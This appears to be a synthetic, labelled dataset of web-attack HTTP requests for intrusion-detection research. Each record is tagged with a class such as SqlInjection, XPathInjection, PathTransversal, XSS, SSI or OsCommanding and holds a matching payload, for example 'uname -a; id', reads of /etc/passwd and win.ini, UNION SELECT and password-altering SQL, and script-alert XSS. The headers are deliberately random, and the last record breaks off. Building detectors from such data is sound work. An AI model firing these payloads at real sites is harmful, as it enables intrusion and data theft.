GET /thsnlir8olneiE2/pi/sBw/nenTAae9alopuein2/axUPGd4a64/nhtRHuieegse/blbptrn6t/tqmUkSa81Q7fJtFBM_/ac@7H9qnlXPnzhfv4./eHh2seeeiiai/uM/entoezcsai7a1yExPa.mdb?sa=ahnaif%3Cesnnph-pdlike+ot&i6lalks55fee=t2&nMRoutrqa8b=uA6&e8miratepI8cyh=edhCbdenah&gtaeudaf6eyrrs=4368814224&gstNqnsIxDmehb=%3Cmeta+++++http-equiv%3D+%22++++refresh+++%22+++++content%3D+%22++++0%3Burl%3Djavascript%3A++++%5Balert++++%28%27Zvumtd5%27%29%3B%5D%22+++%3E HTTP/1.1
Host: www.ndt7uNw.be
Connection: eNiorn
Accept: */*;q=0.4
Accept-Charset: x-mac-chinesetrad, x-mac-turkish
Accept-Encoding: deflate, gzip, deflate;q=0.6, compress, gzip;q=0.8
Accept-Language: oa-trddikV, a-ph, 99s7yo-t
Cache-Control: no-cache
Client-ip: 48.5.47.91
Cookie: maeaO=jptv$nsd;htpassRhavinggME15eall5l=6crLb;reri8g4I4np0nnh=haTselecttlowinnts0;6Oi5a=4m=
Cookie2: $Version="0"
Date: Sun, 12 Mar 06 13:13:41 UTC
ETag: "czJyaTq7@vJjs.KcRANI"
Expect: eplnt
From: peTeu9@mayraae.fr
If-Modified-Since: Sun, 12 Oct 08 06:14:27 GMT
If-Unmodified-Since: Mon, 03 Nov 08 18:36:07 GMT
If-Match: "WrKP27J.hjXxkUaeMc"
If-None-Match: "9PVXS6pC51Vzh4ZZ"
If-Range: Mon, 02 Mar 09 09:09:36 UTC
Max-Forwards: 0273
MIME-Version: 2.6
Pragma: n=o
Proxy-Authorization: elWea ara5=ThudDeet
Authorization: ietxr anrefpre=Oqsir
Range: 3-25949,-0524
Referer: /tecdq/oafsHer.cfm
TE: deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/9.9 (X11; U; Linux i386 3.4; 09-5a; rv:8.9.5) Gecko/03844270
UA-CPU: x86
UA-Disp: 3073,5344,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 581x8741
Via: HTTP/5.1 www.ltebddv.css, Tasc/4.6 246.234.226.165, FTP/7.0 88.33.70.47
Transfer-Encoding: compress
Upgrade: mtnf/1.5
Warning: 047 125.243.221.59 "FolaPnotvWe1rchha" 
X-Forwarded-For: 135.30.4.5
X-Serial-Number: 19525614371
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 47283
Start - Id: 43299
class: OsCommanding
GET /o..klyUxT35btX4./aANCMAUyb7b/hkz5r5ET3CpbUPpXcUo/gME/eQbgO25.php?rdos4nr9ycrt=flHZprV1r3Q&z_A@ye2iOqyu=44&dwfsWtgthcl17=++++%3B+++++echo++++%3B++w+++%3Buname++-a%3B+id&dsu=39885517&EsiEvcozeaaCqt=jf9Dlb&aemyginsM1onek=tcaoad&e58otl=e0ld+5wIjni%3Fimgos&iey=476&DbpHM=malh&vstyleT@p@lobjectconnecte=8712&tSoni=14&DrtntDNtw=50445336&.1JM=s&oey9=l7%3Frlikeeed HTTP/1.0
Host: 30.134.63.90
Connection: uwapr
Accept: application/zip, image/*;q=0.3, application/*;q=0.7
Accept-Charset: windows-1254, x-mac-turkish;q=0.0, iso-8859-7
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: e=aewh
Client-ip: 167.243.142.209
Cookie: rhoiirie=32707496;7asctu=149;frs5HLos=anfteo1st sh;zfhiExig5hgtia=processing-instruction6l;4aziib=Wb
Cookie2: $Version="7"
Date: Sat, 04 Feb 06 05:26:08 CET
ETag: W/"pGAcH-IoVLLI.qP.7"
Expect: 100-continue
From: 4obu@odhS32t2rn.ch
If-Modified-Since: Tue, 23 Mar 10 24:38:43 CET
If-Unmodified-Since: Thu, 18 Feb 10 04:58:46 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 19 Sep 05 05:23:10 UTC
Max-Forwards: 9127
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM cmhhMmwzZGlvdWRkT3NzZW5MbDdhZWlkbGFzc2xFdGUzbjBsc25jY25ya2pvb24=
Authorization: Digest cnonce="nTyB"
Range: 534213-
Referer: http://www.8bGi.uk/n9mthe/saeArxe/x02n4x.jpg
TE: trailers,chunked;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/4.5 (Machintosh; U; Mac OS X 9.5; u0-ns; rv:1.4.1) Gecko/59491895
UA-CPU: Sparc
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: evemx/1.6 142.180.216.74, HTTP/5.0 www.iv8air.gif, 1.2 www.hherTlg.htm
Transfer-Encoding: deflate
Upgrade: svhC/6.6, eeeovf/0.6, Rs9jj/2.4, inuc/6.8
Warning: 597 167.142.104.140 "ureioenlrkas6ps" 
X-Forwarded-For: 31.255.144.84
X-Serial-Number: 33268910997830583
----: --------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43299
Start - Id: 35224
class: SqlInjection
GET /hqxj.PD/osnroleeoi/E6/t0aell4one9Ceemoi/lsa/1ObBq/fEqfcfNF8XYegsNokAS.png?fmclwql7i6b4=694&oau=65&u5hns=I%7Ew9&@V2RTlike.=2ts2Mu&eAmnierpIus70t=mZ%40oZZl&lisusras=%40nGhtpass&z1MJcb1qwheresn=%241t4&3iSMtwR=hIB_B8hQX&ssptmKbaseEroi=iallt5ts&tneowdam=%27UNIONALLSELECTfieldFROMlangWHERE%27%27%3D+++%27&htxqtBhlq6=tDVTr_E HTTP/1.0
Host: www.ri0nrjpti.net
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: na-Oeiegoi
Cache-Control: min-fresh=3
Client-ip: 1.129.63.171
Cookie: ne9oe=oFif0j
Cookie2: $Version="67"
Date: Fri, 01 Feb 08 03:05:31 CET
ETag: "NfOfdyVU6e@4HME"
Expect: dsSr=Keec;ibhiddns=fentrb
From: oeeetot@ecjsbsx.org
If-Modified-Since: Wed, 17 Jun 09 19:20:54 CET
If-Unmodified-Since: Tue, 20 Apr 04 24:19:06 UTC
If-Match: "aoKEF5FZ3@G5fWB-"
If-None-Match: "_uXR.-4dYrX7BMO3"
If-Range: *
Max-Forwards: 3
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: alkiR qetet=eoDage
Authorization: Basic MWdNbmVuaWI6aHRpb2U=
Range: -2,109-7
Referer: http://b5cew8.cz/ir9oi/6fjy.nsf
TE: chunked,chunked
Trailer: Accept-Language
User-Agent: sXBdsx http://www.ewe3nah.cz
UA-CPU: Sparc
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: e198t4/2.1 www.nrscim6.shtml, 8.9 www.ftee.gif, eoo/4.5 204.197.210.110
Transfer-Encoding: gzip
Upgrade: doyt/0.4, bE3yw/1.4, otunr5/6.9, 62V/0.3, trd9ad/7.6
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 735496334921593
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35224
Start - Id: 35800
class: XPathInjection
GET /tuiPZl0/8C9bNbQkg/cyhePrnnhnooa/rlcrYrRldueTen/xee/YKnAysystembetweenRTcmd5S/sNqg2Mw4Q2Y@U/frnosk/dosRaalcerdihmsm/pfu5pn.mdb?2aoe=Isd%27+++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+%27reo5erh%27%3D%27&iYoe=a9tb6cdn&seIllttey=i8&oebHoootrccYg=768&CbinpbintmplE5MIC.=sGjGyaOPXg_ HTTP/1.0
Host: 119.154.126.236
Connection: keep-alive
Accept: text/plain;q=0.6, text/*, application/postscript;q=0.5
Accept-Charset: windows-1251, x-mac-korean;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 136.152.12.105
Cookie: Kx5qtelnetHGD=dnte
Cookie2: $Version="6"
Date: Mon, 11 Jan 10 09:06:27 CET
ETag: W/".LkKw7IuwRwvfgL-"
Expect: 37tora
From: gH0ez@Sireoah.fr
If-Modified-Since: Fri, 18 Feb 05 06:02:57 GMT
If-Unmodified-Since: Sun, 03 Jun 07 08:15:19 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1864
MIME-Version: 7.5
Pragma: io3mm3dt='Urr'
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest opaque="rt7ngt"
Referer: /etjdi1u/Cd7ei/tA9c.tar
TE: trailers,trailers
Trailer: Expect
User-Agent: EEtL9/5.1.0.6
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: 0.7 97.3.176.16
Transfer-Encoding: deflate
Upgrade: n2smtz/0.7
Warning: 463 52.135.104.34 "le3vso" 
X-Forwarded-For: 240.46.36.222
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35800
Start - Id: 42461
class: SqlInjection
GET /lVWH_66ZcynwMKcRlat9/rYw0jE63CfBkGBZL2/8ed/iG@T1Dk@/mt9sztqtntlu/aD/9bb0nCxMCoTrco/s3Rah2rrsEscnainq9nd/fiodddneuorsa/Te/emrm2netdyYemowda.shtml?passwd0perlnI01M6-n@=%3Balter+table+nilatasi++++set+password+++%3D++++%27tnlso%27+++++where+name+++++%3D+++++%27oh%27%3B HTTP/1.0
Host: 234.166.62.93
Connection: close
Accept: text/*
Accept-Charset: iso-8859-2;q=0.6, isiri-3342
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale=1
Client-ip: 13.69.56.93
Cookie: 6aeozm=3516643;meueett= AnsAc84N]et tuaet;8SYQFB=ty@HsmEW;GmrnPeea0a=077;Eemaaw5kr4ne=aF4@eMP
Cookie2: $Version="3"
Date: Mon, 12 May 08 11:09:21 UTC
ETag: "Fg4GgecH.zX4nmej"
Expect: 100-continue
From: eabBn@aahunaiie.fr
If-Modified-Since: Tue, 01 Mar 05 11:00:45 CET
If-Unmodified-Since: Mon, 07 May 07 16:26:46 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 05 May 06 24:47:10 UTC
Max-Forwards: 30
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic aWZ0b3Q6dnJFZW50
Authorization: lnre ewrw8=aEasc
Range: -9
Referer: http://www.egha.cz/gsolcge/ehcpkes/sgwbc1/eT9my.txt
TE: trailers,gzip,chunked
Trailer: If-Unmodified-Since
User-Agent: rifhnEohLn (aECOQrbGAq; o4DucNOC)
UA-CPU: 68000
UA-Disp: 3357,1870,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 793x9881
Via: 8.9 www.laoe8h.png, 9edm5s/5.2 www.atamSak.css
Transfer-Encoding: compress
Upgrade: jsp/7.2, oneh/0.7, napyn/4.5, alsCmj/3.1, tec/8.4
Warning: 690 www.oh1tele.htm "oisyiybcmeat8Ot" 
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42461
Start - Id: 48857
class: XPathInjection
GET /nttcraynsiX/aesmanEdprurdms/sD7m8dee1z/cXuNUCVHHne3LHQK_Y0d/aveqtselrwhkTeae/gU6PIzfTI0LI/r498SnN/hxe34w/ohytdsez9dtrdgitykt/rsgPoStha/mNTw0/ug8z3jOM7_MbQaccess_loge.cfm?B1e=%3Eu&neeteehhonol=10&Xtlrrha2=3616522&ura2heh=95621874&u5h=1560142209&susnnap2=ygi9Tkti3l4shl&iulhiteyn=lsinomr&6uah=eVCgRXnLl-&ozKi7s1=asODsivqCg&9ccUB60=end%27+++++or+2aDe%2FU%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D09%5D+or++%27lz9hn%27+++%3D+%27&ethuD=ozCIT50xF HTTP/1.0
Host: www.e2a8.net:78
Connection: n3lgyae
Accept: */*
Accept-Charset: iso-8859-3;q=0.2, macintosh, euc-cn, windows-1250
Accept-Encoding: 
Accept-Language: l9jedts-irkil;q=0.5, hltNf-orxWto
Cache-Control: no-store
Client-ip: 136.172.120.185
Cookie: 0mRsevgdttraAg=yBgC5vz;OucaEn9xMtshutdownn=47;Zi5xHF=2;he2=1;betdCH=nrsSVF1.
Cookie2: $Version="658"
Date: Fri, 11 Jul 08 04:17:15 UTC
ETag: W/".D0ehbAU9Y6-@zosB"
Expect: akafu79
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Wed, 10 Nov 04 17:17:37 UTC
If-Unmodified-Since: Fri, 28 May 04 09:28:46 GMT
If-Match: *
If-None-Match: "yGPXJDIkby_lr@n"
If-Range: *
Max-Forwards: 655
MIME-Version: 4.5
Pragma: s9l=yl7ph
Proxy-Authorization: NTLM a05vZXJvNWU1aHRyaGFzM21hblBscHNuZWliMmh0RXRp
Authorization: Digest realm
Range: 845-,90670-12915,351536-
Referer: http://www.3tenr.org/ee3eat.htm
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.6 (Windows; U; WinNT 7.7; 6a-tY; rv:1.2.6) Gecko/15795368
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1420x8323
Via: FTP/2.8 172.204.130.101
Transfer-Encoding: gzip
Upgrade: wrmk/0.8, tyuf/8.4, rih/4.1
Warning: 031 102.38.172.102 "nisa2e2yv" 
X-Forwarded-For: 186.251.4.115
X-Serial-Number: 177199337529573688
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48857
Start - Id: 49986
class: XPathInjection
GET /Bn/gYFWlx.QE7@./tSdet5cielositooows6/gEhvV_96Bc5WJ/sryaeli.pl?ltayne6a=7&zIF3519CGia=tw3wArw&tiiodf=sh&oeiirhiier=e9tANe%5D&o3iaewkuisha=ostnUtitulHdniiM&eIoDf=hmgo&6idwasv=u3ilsnsr48dt&wahet=+e%27usrn&gr1e4anactopsu=5oO&dnGzti3=grTmu%27+++or++++1%3C++kee0%2Frtnbrd%2Fren%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D5%5D+++or++++%27Irne%27%3D%27&bneEplod=eoamDHte%5Din+U4r&4nk=1 HTTP/1.0
Host: 237.207.88.135
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: euc-jp, x-mac-arabic, euc-jp;q=0.5, iso-8859-7;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: diopq-oifep;q=0.2, toe-rC4a1;q=0.4, 45ezfpwH-egi1rreh;q=0.7
Cache-Control: no-store
Client-ip: 237.62.233.210
Cookie: g3SyiScayA=rC-LQtSPqrAX;Muqarpwh5iLsc=yojjm;_positionEpGJV4=iylreplace;a1se=orCas_fs5Z3C;mif=Eiiito0dpa
Cookie2: $Version="9"
Date: Wed, 25 Jan 06 01:42:04 UTC
Expect: 100-continue
If-Unmodified-Since: Mon, 13 Nov 06 15:07:59 UTC
If-Match: "J1aFHMN7HsDT-72_STaK"
If-None-Match: "WA1Jo5-NJ0qFtp780C6_"
Max-Forwards: 6562
Authorization: NTLM ZnJleTJidGhMc2lpeGhyZW5nbmE3bG10c2FSb2JldVNhZXJpNXdrbzR3Tw==
Range: 8886-360900,-39090
Referer: /t8Tsino/mviqlao/xgOpd.php3
TE: trailers
User-Agent: blni/1.6.3.9
UA-Pixels: 0803x6416
Via: 7.1 www.ator.css:9575, FTP/5.3 www.snuo3ir.htm, 9.0 www.otsw.jpg
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49986
Start - Id: 45089
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.0
Host: 122.167.178.206
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=96
Client-ip: 214.121.21.204
Cookie: mYaeiahrOdiOrls=q
Cookie2: $Version="8"
Date: Mon, 03 Jul 06 09:35:35 GMT
ETag: W/"lZRSKosY.s45V9ZcHcP"
Expect: 100-continue
From: NT7ihoi@svOy.it
If-Modified-Since: Wed, 30 Nov 05 11:41:10 CET
If-Unmodified-Since: Mon, 20 Mar 06 13:02:50 GMT
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: "qyVWM118WEydh2dCXQD"
If-Range: Sun, 11 Mar 07 04:04:23 CET
Max-Forwards: 80
MIME-Version: 2.7
Pragma: ly4z='pj'
Proxy-Authorization: Digest cnonce="lEha"
Authorization: Digest nc=aC1a3Cc9
Range: 61-,599945-,96-
Referer: /denxa/tocA/0lvek/wyoe/e2vnot.php3
TE: deflate;q=0.0,gzip;q=0.0,trailers
Trailer: Connection
User-Agent: Mozilla/1.6 (Machintosh; U; Mac OS X 9.8; de-6e; rv:0.5.7) Gecko/27206987
UA-CPU: StrongARM
UA-Disp: 0628,6146,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 213x015
Via: 2.1 www.nmIjfen.jpg, 6.3 54.170.128.53
Transfer-Encoding: identity
Upgrade: ttpNf/8.4
Warning: 131 165.136.34.196 "tchbajdsaa" "Fri, 12 Mar 10 18:52:44 CET"
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 95535933478300
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45089
Start - Id: 45623
class: PathTransversal
GET /bealjhoiebA/yfe/ctershbazhesnf0nmo/hdTe4plyO/7ee9irryuqch/eLG/ahxZ40J-zmTQA-8vo/hDtxhh/ewJtHQzi_Oi/mwgetFd_Z/eaiobeitbbeeeezr.png?dreiawt=3374194&v0=+tibENs&1stwiil4naenn=aoioEbshutdowneseelt&parpagmtti1t=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&1oOrOtLnanro9=tot3oio0oewda6e&tgr=6115137590&itsrecie=2dyEeL&ih9lvee=hrkLTFr&yboot.ini6z=5631587 HTTP/1.1
Host: www.sRiiPmr.fr
Connection: tlwbeis
Accept: audio/x-wav;q=0.4
Accept-Charset: iso-2022-jp, x-mac-korean, cp-932;q=0.1, windows-1251;q=0.6
Accept-Encoding: 
Accept-Language: s-g7dst
Cache-Control: max-stale
Client-ip: 113.243.210.237
Cookie: A4xp_dzz39=4zVi
Cookie2: $Version="85"
Date: Fri, 02 Jul 04 14:36:53 UTC
ETag: W/"hYq.Qe6vS5JVPkNg"
Expect: seoOtore
From: aieelt@lnoh1ttGc.st
If-Modified-Since: Thu, 08 Apr 10 03:22:33 CET
If-Unmodified-Since: Sat, 28 Jun 08 14:49:15 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Sep 06 19:44:15 GMT
Max-Forwards: 7
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic dG9pYjU6bG9Ib213Yw==
Authorization: Digest response="AAECA8adEca0bFA49EEee6Fd9B3a8488"
Range: 942-,71595-5
Referer: http://Ty5l.it/itzssTSu/itns5oes.mdb
TE: deflate;q=0.2,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.5 (X11; U; Unix 4.2; iW-zs; rv:0.0.1) Gecko/79766013
UA-CPU: Sparc
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0039x975
Via: FTP/3.1 www.epolm.html
Transfer-Encoding: compress
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45623
Start - Id: 47730
class: XSS
GET /znKm/mYco8IXxwBVYTc/irYYislW_pfRClP/idtheaiaGsah7tnpR/rce3edvyy/DvMwlk_UpfTnD.gif?EcprlbuvTasc=eNB%5Cscriptt%7Clwindow.openeit7i&1uAi=5232550735&AX9TDLpasswdbin=a%40O2winntliTotm1neho9Spi&eyn=T%3A&sato8qdsne=epa&allU1Taht=76aOp_qx&mtJhiTyvtnr=20&mrHssm=3&th8ltqp=61021&rN=%3C%21%5BCDATA%5B%3C%21--%5D%5D+++%3E%3Cscript%3E%5Balert++++%28%27aderecomqr%27%29%3B%5D%2F%2F--%3E%3C%2Fscript%3E&osa3eo=j&ote=rNemceu0kscEn&CiafksaAa=46844968&hjoro4lis=42575525&G_04kiTOXh8=temNceonotb HTTP/1.1
Host: 187.92.53.20
Connection: elee
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 98.106.69.46
Cookie: anxhtixi9se2I=gsytiieleeQ;eth9eedkvo3he=Eln8ecironhnmiotO;olpdo7vhEti61=r3r(;pdbNdmSauSt=e(;AVmiaeTtft4erce= l;igiogsd6nneague=aeVR4
Cookie2: $Version="02"
Date: Sun, 04 Mar 07 22:46:05 GMT
ETag: ".5N_degk3RJ9GSTPlW5E"
Expect: 100-continue
From: rlNe@ecetad6.fr
If-Modified-Since: Sat, 01 May 10 05:16:05 UTC
If-Unmodified-Since: Thu, 09 Sep 04 16:51:26 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 23 Sep 06 20:52:20 GMT
Max-Forwards: 851
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic bW9hcmE6QWN5c2JlZXM=
Authorization: Digest uri=http://04aR.st/IpidxdeT/7eqeo/dqn0/lnugf/Dleaa.mdb
Range: 9-,057-2,501963-763
Referer: http://qrENT.it/dsdr7a/c3e3mu/k5nnO5/traebaNc.pl
TE: chunked
Trailer: Date
User-Agent: iyeMriaserElrnT
UA-CPU: PowerPC
UA-Disp: 2301,334,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0710x100
Via: 6.4 240.33.16.190
Transfer-Encoding: gzip
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 499 www.ObTif.js "Thryti" 
X-Forwarded-For: 75.33.202.51
X-Serial-Number: 4647355
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47730
Start - Id: 39589
class: SSI
GET /jmeval3styleSn/aQA/a2fy7PYvHqAqfiP/hohiese7eteilsoembrt/aEOrgswXt/bZCT3Ysamaccepts/eoo/eVJN/aLn4a7K.asmx?RHUcC=2eh4e&fMeuwun=%3C%21--++++%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22++++--%3E&Mbt4ZAt3vtmp=E+To%2F3ewh HTTP/1.1
Host: www.lekdehAytr.uk
Connection: keep-alive
Accept: application/rtf;q=0.9, audio/x-wav;q=0.7
Accept-Charset: x-mac-hebrew;q=0.2, euc-tw;q=0.3, x-mac-cyrillic;q=0.6, shift_jis, x-mac-turkish;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: nihte-rtlfRit, EeeraeUe-tascr;q=0.0
Cache-Control: aa=anqospe
Client-ip: 139.247.11.55
Cookie: 0s8TLBtelnetX0d=0266040101
Cookie2: $Version="5"
Date: Thu, 15 May 08 02:39:44 CET
ETag: "YVC3VkK4ypDbvG-NGs"
Expect: etree
From: szEete@ence.uk
If-Modified-Since: Wed, 23 Sep 09 06:35:21 GMT
If-Unmodified-Since: Mon, 21 Nov 05 02:38:08 CET
If-Match: "DBohE5iibs1WRdacgl"
If-Range: "cYls4Mbt8SBIZMo"
Max-Forwards: 9843
Pragma: eeh='eInew'
Authorization: nHdi ga5e=ou2cdG
Range: 5591-,251722-40474
Referer: /eoddRo/gpash.css
TE: trailers,trailers,chunked;q=0.8
Trailer: Accept-Language
User-Agent: Mozilla/0.0 (Windows; U; WinNT 5.0; oo-aa; rv:0.3.1) Gecko/61199105
UA-Disp: 779,442,32
UA-OS: Win98
Via: FTP/9.7 www.s0lR.png, 5.4 212.150.22.147
Transfer-Encoding: deflate
Upgrade: oshili/5.5, wen/5.9
Warning: 693 www.esm2no.shtml:36 "eEi40rmtp" "Sun, 28 Feb 10 20:28:26 CET"

null

End - Id: 39589
Start - Id: 36072
class: PathTransversal
GET /Iyn1loaefLytt/sotatceE0etehRnisTa/svTCfyng2YK9riHA8k_/0Ok2B71kQ/lLp2.@oDt_.3tk9rDek/aqkzRmGP/yc.js?V0CGKkzHrxY=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&l0p0hhc=igin53s%5Coh+xmail8&uma=1912807&ansNnLwceo=0ie&QM0httpiH9MpasswdUA=oe&f1nVo_o=o0wfs8&rquyuog2m=od%40&nIDN8ehuoSs=bHhtmp&SQaeS8aS=91&tsettba6avcnoee=EgpuRtostjrnao1tur HTTP/1.1
Host: 140.2.47.147
Connection: keep-alive
Accept: audio/basic, video/mpeg
Accept-Charset: x-mac-hebrew, windows-1257, x-mac-arabic;q=0.7, shift_jis;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 150.142.192.26
Cookie: tFdyT=osiio6ae
Cookie2: $Version="080"
Date: Wed, 10 Jan 07 01:24:18 CET
ETag: W/"CHRBHIdtJ0gNNdG"
Expect: taRsras
From: Esva@5c4oorIai.it
If-Modified-Since: Tue, 14 Oct 08 23:18:10 GMT
If-Unmodified-Since: Mon, 03 Apr 06 18:00:51 CET
If-Match: *
If-None-Match: "SEoJqpB@sJL79pzysCs"
If-Range: Sat, 24 Jan 09 01:04:56 UTC
Max-Forwards: 71
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic ZXd3b2Y6aHh0YQ==
Authorization: Basic Y3J0TmlhOmltbGxvYQ==
Range: -31,-3,49859-
Referer: http://zie2kpi.org/6ao6isn/eeeiise.exe
TE: deflate
Trailer: Warning
User-Agent: Mozilla/6.9 (X11; U; Open BSD i586 0.5; 8d-sn; rv:9.4.9) Gecko/43913646
UA-CPU: x86
UA-Disp: 6269,3972,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 745x4826
Via: 9.4 www.bene.jpg, 6.0 145.84.143.195, FTP/0.7 www.i0qtsihs.shtml
Transfer-Encoding: gzip
Upgrade: sztad/3.9, y9oto/3.0
Warning: 470 84.239.232.183 "ogeeensejl" "Mon, 03 Jan 05 03:00:35 CET"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36072
Start - Id: 35998
class: PathTransversal
PUT /AZxU/lntltir1ccn9e/fj.tiff? HTTP/1.1
Content-Length: 158
Content-Language: iFsatNn,ti
Content-Encoding: identity
Content-Location: http://www.ie3ts.de/aEtar/hiavq/s8sy.dll
Content-MD5: MU1ucXVyZWxpZDVvZXFldA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Dec 05 20:24:51 CET
Last-Modified: Sun, 19 Aug 07 13:02:45 GMT
Host: www.2pSsehSeg.it:80
Connection: keep-alive
Accept: image/gif;q=0.6, application/postscript;q=0.3
Accept-Charset: iso-8859-3;q=0.3, x-mac-greek, x-mac-ce;q=0.9, utf-8
Accept-Encoding: *;q=0.3
Accept-Language: 8iyeO9st-rikg;q=0.3, gh-snlxhte, so8tbson-q7dcmMQl;q=0.4
Cache-Control: max-age=02
Client-ip: 27.34.193.196
Cookie: GcatVf-rT2FX=ietinm;Lbhona=313520925;is=9935674;3phoohko=7logl= 
Cookie2: $Version="232"
Date: Sat, 15 Jul 06 24:09:25 UTC
ETag: W/"z@mku5d_bz8gZ96"
Expect: 100-continue
From: rA7tR@tqia61e.ch
If-Modified-Since: Thu, 10 Aug 06 10:39:54 UTC
If-Unmodified-Since: Mon, 19 Jun 06 20:40:34 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 07 Mar 10 01:51:44 CET
Max-Forwards: 4
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic bmlscm5ndDpkMjh1YWE5
Authorization: Basic dHR0NGNvdTptZG9EZHl1
Range: 4611-51,7-,2106-
Referer: http://www.eNa9hhkx.uk/aThr/onbo1ohr/alos/eAiRsea/dsiezk.pdf
TE: chunked,trailers,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/3.6 (X11; U; Solaris 2.4; ni-zs; rv:1.4.0) Gecko/17510941
UA-OS: Win98
UA-Pixels: 551x993
Via: 0.3 www.a0ac3L.shtml:3
Transfer-Encoding: compress
Upgrade: uUi/7.8, eeds/2.6, Myede/4.4
Warning: 420 www.esiroa.js "tdoieaa" "Wed, 03 Jan 07 09:34:59 GMT"
X-Forwarded-For: 133.228.168.254
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cWNYnTH97=mKa56TN-2NMw&5iV7O=\WINNT\system.ini&sed619o=pf%umejae &secuCngvtan=993885&eenrer=5622015&tisdrn4nafoD=D&uhiueao7p=15262&weHpr=0cWr iedeepfosd

End - Id: 35998
Start - Id: 37301
class: LdapInjection
POST /dSmezlyhobosruzi/eMUvz@JzxR3-03QeBVB8/5ueCCs/tGE0ZbE-K/nXZ7kRdx/Tdseeahllqlahnneluoh/Icynull4@khOHV/ixno9libaw/Z3IdhoJX/nHZ76S-zQ0lCMjZyuwh9.jpeg? HTTP/1.0
Content-Length: 64
Content-Language: tpeinre
Content-Encoding: deflate
Content-Location: http://wr9us.de/hrpt4hYd/Neees/unSjaca/tlLtha/taleeP.asmx
Content-MD5: a25TZXV0d2VnemVlZWlBdA==
